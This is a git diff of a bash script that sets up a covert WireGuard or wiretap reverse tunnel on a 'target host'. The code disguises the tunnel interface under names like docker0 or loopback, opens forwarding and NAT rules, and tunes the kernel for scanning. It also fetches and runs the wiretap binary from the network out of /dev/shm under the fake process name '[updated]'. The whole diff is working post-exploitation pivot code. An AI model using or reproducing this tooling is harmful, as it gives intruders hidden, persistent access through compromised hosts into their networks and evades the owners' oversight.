sfwg

diff --git a/sfwg b/sfwg
--- a/sfwg
+++ b/sfwg
@@ -1,10 +1,9 @@
-#! /bin/bash
+#! /usr/bin/env bash
 
 
 # This script sets a wireguard reverse tunnel on a target host.
 
 # X=<VERSION>-<PRIV>-<PUB>-<ENDPOINT>-<DEV>-<IPV4Addr>-<IPV6Addr>
-
 
 [[ -t 1 ]] && {
 # shellcheck disable=SC2034 # Unused
@@ -30,8 +29,10 @@ CUL="\e[4m"
 
 [[ -z $ADDRESS ]] && ADDRESS="192.168.0.1/32"
 [[ -z $ADDRES6 ]] && ADDRES6="fd::1/128"
-[[ -z $PEER_ADDRESS ]] && PEER_ADDRESS="192.168.0.2/32"
-[[ -z $PEER_ADDRES6 ]] && PEER_ADDRES6="fd::2/128"
+# [[ -z $PEER_ADDRESS ]] && PEER_ADDRESS="192.168.0.2/32"
+[[ -z $PEER_ADDRESS ]] && PEER_ADDRESS="192.168.0.0/29"
+# [[ -z $PEER_ADDRES6 ]] && PEER_ADDRES6="fd::2/128"
+[[ -z $PEER_ADDRES6 ]] && PEER_ADDRES6="fd::0/125"
 [[ -z $WITHOUT_IPV6 ]] && WITH_IPV6=1
 [[ -z $WITHOUT_TUNE ]] && WITH_TUNE=1
 [[ -z $TYPE ]] && TYPE="wireguard:wiretap"
@@ -73,7 +74,7 @@ x2data()
     PEER=${CONF[2]}
     EP=${CONF[3]}
 
-    [[ ${#CONF[@]} -ge 5 ]] && [[ -z $WGDEV ]] && [[ ${#CONF[4]} -gt 1 ]] && WGDEV=${CONF[4]}
+    [[ ${#CONF[@]} -ge 5 ]] && [[ -z $WG_DEV ]] && [[ ${#CONF[4]} -gt 1 ]] && WG_DEV=${CONF[4]}
     [[ ${#CONF[@]} -ge 6 ]] && ADDRESS=${CONF[5]}
     [[ ${#CONF[@]} -ge 7 ]] && ADDRES6=${CONF[6]}
 }
@@ -90,6 +91,19 @@ ipt()
     iptables -t "$table" -D "$@" 2>/dev/null # Delete old rule.
     iptables -t "$table" "$first" "$@"
 }
+
+ipt6()
+{
+    local first
+    local table
+    table=$1
+    first=$2
+
+    shift 2
+    ip6tables -t "$table" -D "$@" 2>/dev/null # Delete old rule.
+    ip6tables -t "$table" "$first" "$@"
+}
+
 
 sysinc()
 {
@@ -114,7 +128,7 @@ sysdec()
 # Tune Network for scanning.
 tune()
 {
-    sysinc net.netfilter.nf_conntrack_max 1048576
+    sysinc net.netfilter.nf_conntrack_max 2097152
     sysdec net.netfilter.nf_conntrack_tcp_timeout_syn_sent 10
     sysdec net.netfilter.nf_conntrack_tcp_timeout_syn_recv 5        # default is 30, 5 because of wg tunnel
     sysdec net.netfilter.nf_conntrack_tcp_timeout_last_ack 5        # default is 30
@@ -125,6 +139,7 @@ tune()
     sysdec net.netfilter.nf_conntrack_tcp_timeout_established 10800 # 3h, default is 5 days
     sysdec net.netfilter.nf_conntrack_icmp_timeout 10 # default is 30
     sysdec net.netfilter.nf_conntrack_udp_timeout 10  # default is 30
+    # sysdec net.netfilter.nf_conntrack_udp_timeout_stream=120 # default is 120
 }
 
 wg_find_dev()
@@ -135,28 +150,29 @@ wg_find_dev()
 
     # If user did not specify a device then find
     # an available wireguard device.
-    [[ -z $WGDEV ]] && {
+    [[ -z $WG_DEV ]] && {
         # Try to 'hide' as any of these interfaces
         for dev in docker0 loopback docker1 sf0; do
             # Record a device that doesnt exist
             str=$(ip -details link show "${dev}" 2>/dev/null) || { [[ -z $notexist ]] && notexist="${dev}"; }
-            [[ ${str} == *wireguard* ]] && { WGDEV="${dev}"; break; } # Found old wireguard device.
+            [[ ${str} == *wireguard* ]] && { WG_DEV="${dev}"; break; } # Found old wireguard device.
         done
-        [[ -z $WGDEV ]] && WGDEV="${notexist}"
-        [[ -z $WGDEV ]] && ERREXIT 255 "Could not find a free device name. Try ${CDC}export WGDEV=Blah0${CN}"
+        [[ -z $WG_DEV ]] && WG_DEV="${notexist}"
+        [[ -z $WG_DEV ]] && ERREXIT 255 "Could not find a free device name. Try ${CDC}export WG_DEV=Blah0${CN}"
     }
 
     ### Check if it exists.
-    ip link show dev "${WGDEV}" &>/dev/null && ERREXIT 255 "Device ${CDM}${WGDEV}${CN} exists. Try ${CDC}ip link del ${WGDEV}${CN} or ${CDC}export WGDEV=Blah0${CN}"
+    ip link show dev "${WG_DEV}" &>/dev/null && ERREXIT 255 "Device ${CDM}${WG_DEV}${CN} exists. Try ${CDC}ip link del ${WG_DEV}${CN} or ${CDC}export WG_DEV=Blah0${CN}"
 }
 
 wg_up()
 {
     local fn
     local addr
-    command -v wg >/dev/null || ERREXIT 254 "WireGuard not installed. Try ${CDC}apt install wireguard${CN}"
+    command -v wg >/dev/null || ERREXIT 254 "WireGuard not installed.\nTry ${CDC}apt install wireguard${CN} or ${CDC}export TYPE=wiretap${CN} to force wiretap instead."
     command -v sysctl >/dev/null || ERREXIT 255 "sysctl not found. Try ${CDC}apt-get install procps${CN}"
     command -v iptables >/dev/null || ERREXIT 255 "iptables not found. Try ${CDC}apt-get install iptables${CN}"
+    command -v ip6tables >/dev/null || { WARN "ip6tables not found. Disabling IPv6". unset WITH_IPV6; }
     command -v ip >/dev/null || ERREXIT 255 "ip not found. Try ${CDC}apt-get install iproute2${CN}"
 
     wg_find_dev
@@ -166,9 +182,10 @@ wg_up()
         WARN "IPv6 disabled. Try ${CDC}sysctl net.ipv6.conf.all.disable_ipv6=0${CN}"
     }
     [[ $(sysctl -bn net.ipv4.ip_forward) -eq 0 ]] && sysctl -q -w net.ipv4.ip_forward=1
+    [[ $(sysctl -bn net.ipv6.conf.all.forwarding) -eq 0 ]] && sysctl -q -w net.ipv6.conf.all.forwarding=1
 
-    ip link del "${WGDEV}" &>/dev/null
-    ip link add "${WGDEV}" type wireguard || ERREXIT 255
+    ip link del "${WG_DEV}" &>/dev/null
+    ip link add "${WG_DEV}" type wireguard || ERREXIT 255
 
     fn="/dev/shm/private.$$"
     echo "$PRIV" >"${fn}"
@@ -176,30 +193,38 @@ wg_up()
     [[ -n $WITH_IPV6 ]] && addr+=",${PEER_ADDRES6}"
     # addr="0.0.0.0/0"
     # [[ -n $WITH_IPV6 ]] && addr+=", ::/0"
-    wg set "${WGDEV}" private-key "${fn}" peer "$PEER" allowed-ips "${addr}" endpoint "${EP}" persistent-keepalive 25 || ERREXIT 255
+    wg set "${WG_DEV}" private-key "${fn}" peer "$PEER" allowed-ips "${addr}" endpoint "${EP}" persistent-keepalive 25 || ERREXIT 255
     rm -f "${fn}"
 
-    ip -4 address add "${ADDRESS}" dev "${WGDEV}" || ERREXIT 255
-    [[ -n $WTIH_IPV6 ]] && ip -6 address add "${ADDRES6}" dev "${WGDEV}" || { unset WITH_IPV6; }
+    ip -4 address add "${ADDRESS}" dev "${WG_DEV}" || ERREXIT 255
+    [[ -n $WITH_IPV6 ]] && { ip -6 address add "${ADDRES6}" dev "${WG_DEV}" || unset WITH_IPV6; }
 
-    ip link set mtu 1420 up dev "${WGDEV}"
+    ip link set mtu 1420 up dev "${WG_DEV}"
 
-    ip -4 route add "${PEER_ADDRESS}" dev "${WGDEV}"
-    [[ -n $WITH_IPV6 ]] && ip -6 route add "${PEER_ADDRES6}" dev "${WGDEV}" || { unset WITH_IPV6; }
+    ip -4 route add "${PEER_ADDRESS}" dev "${WG_DEV}"
+    [[ -n $WITH_IPV6 ]] && { ip -6 route add "${PEER_ADDRES6}" dev "${WG_DEV}" || unset WITH_IPV6; }
 
     [[ $(iptables -L FORWARD) != *"policy ACC"* ]] && {
-        ipt filter -I FORWARD -i "${WGDEV}" -j ACCEPT
-        ipt filter -I FORWARD -o "${WGDEV}" -j ACCEPT
+        ipt filter -I FORWARD -i "${WG_DEV}" -j ACCEPT
+        ipt filter -I FORWARD -o "${WG_DEV}" -j ACCEPT
+    }
+
+    [[ -n $WITH_IPV6 ]] && [[ $(ip6tables -L FORWARD) != *"policy ACC"* ]] && {
+        ipt6 filter -I FORWARD -i "${WG_DEV}" -j ACCEPT
+        ipt6 filter -I FORWARD -o "${WG_DEV}" -j ACCEPT
     }
 
     ipt nat -A POSTROUTING -s "${PEER_ADDRESS}" -j MASQUERADE
+    [[ -n $WITH_IPV6 ]] && ipt6 nat -A POSTROUTING -s "${PEER_ADDRES6}" -j MASQUERADE
 
     [[ -n $WITH_TUNE ]] && tune
 
     echo -e "\
-${CDG}SUCCRSS${CN}
-For status: ${CDC}wg show ${WGDEV}${CN}
-To stop   : ${CDC}ip link del ${WGDEV}${CN}"
+${CDG}SUCCESS${CN}
+For status: ${CDC}wg show ${WG_DEV}${CN}
+To stop   : ${CDC}ip link del ${WG_DEV}${CN}
+Check the connection on your server:
+    ${CDC}curl rpc/net/show${CN}"
 }
 
 # Download wiretap
@@ -207,14 +232,30 @@ wt_dl()
 {
     local arch
     local url
+    local os
 
     command -v tar >/dev/null || ERREXIT 255 "tar not found. Try ${CDC}apt install tar${CN}"
 
-    arch=$(uname -m)
-    url="https://github.com/sandialabs/wiretap/releases/download/v0.2.1/wiretap_0.2.1_linux_amd64.tar.gz"
-    [[ $arch == aarch64 ]] && url="https://github.com/sandialabs/wiretap/releases/download/v0.2.1/wiretap_0.2.1_linux_arm64.tar.gz"
-    [[ $arch == i686 ]] && url="https://github.com/sandialabs/wiretap/releases/download/v0.2.1/wiretap_0.2.1_linux_386.tar.gz"
+    [[ -z $OSTYPE ]] && {
+        command -v uname >/dev/null || ERREXTI 255 "uname not found. Try ${CDC}apt install coreutils${CN}"
+        OSTYPE=$(uname -s)
+    }
+    OSTYPE="${OSTYPE,,}"
 
+    os="linux"
+    [[ $OSTYPE == *darwin* ]] && os="darwin"
+
+    arch=$(uname -m)
+    url="https://github.com/sandialabs/wiretap/releases/download/v0.2.1/wiretap_0.2.1_${os}_amd64.tar.gz"
+    if [[ $arch == aarch64 ]] || [[ $arch == arm64 ]]; then
+        url="https://github.com/sandialabs/wiretap/releases/download/v0.2.1/wiretap_0.2.1_${os}_arm64.tar.gz"
+    elif [[ $arch == i686 ]] || [[ $arch == i386 ]]; then
+        url="https://github.com/sandialabs/wiretap/releases/download/v0.2.1/wiretap_0.2.1_${os}_386.tar.gz"
+    elif [[ $arch == *"armv"* ]]; then
+        url="https://github.com/sandialabs/wiretap/releases/download/v0.2.1/wiretap_0.2.1_${os}_armv6.tar.gz"
+    fi
+
+    [[ -f wiretap ]] && rm -f wiretap
     touch wiretap 2>/dev/null || {
         cd /dev/shm || ERREXIT 255 "Change to a writeable directory"
         touch wiretap || ERREXIT 255 "Change to a writeable directory."
@@ -230,8 +271,12 @@ wt_dl()
         wget -qO- "$url" | tar xfz - wiretap && return
     }
     unset IS_DOWNLOADED
+    [[ -f wiretap ]] && rm -f wiretap &>/dev/null # stale file
 
-    ERREXIT 255
+    ERREXIT 255 "Failed to download Wiretap v0.2.1. Download it from
+${CDY}https://github.com/sandialabs/wiretap/releases${CN}
+and start is manually:
+    ${CDC}wiretap serve --private \"${PRIV}\" --public \"${PEER}\" --endpoint \"${EP}\"${CN}"
 }
 
 wt_up()
@@ -261,13 +306,15 @@ wt_up()
     
     [[ -n $IS_DOWNLOADED ]] && rm -f wiretap
     [[ -z $err ]] && echo -e "\
-${CDG}SUCCRSS${CN} - started as ${CDY}[updated]${CN} with pid=${CDY}${pid:-pidoff-missing}${CN}
+${CDG}SUCCRSS${CN} - Started as ${CDY}[updated]${CN} with pid=${CDY}${pid:-pidof-not-found}${CN}
 To stop   : ${CDC}killall wiretap${CN}"
 
     echo -e "\
 To run in foreground:
     1. ${CDC}killall wiretap${CN}
     2. ${CDC}wiretap serve --private \"${PRIV}\" --public \"${PEER}\" --endpoint \"${EP}\"${CN}"
+
+    WARN "${CDM}Wiretap${CN} is ${CDR}not good${CN} for scanning. Consider using ${CDR}root${CN} instead."
 }
 
 [[ -z $X ]] && {
@@ -279,7 +326,7 @@ The variable ${CDY}X=${CN} is not set. Try
 }
 x2data
 
-[[ ${TYPE,,} == *wireguard* ]] && [[ $UID -eq 0 ]] && { wg_up; exit; }
-[[ ${TYPE,,} == *wiretap* ]] && { wt_up; exit; }
+[[ ${TYPE} == *wireguard* ]] && [[ $UID -eq 0 ]] && { wg_up; exit; }
+[[ ${TYPE} == *wiretap* ]] && { wt_up; exit; }
 
 ERREXIT 255 "Set ${CDM}export TYPE=wiretap${CN} or ${CDM}export TYPE=wireguard${CN}"
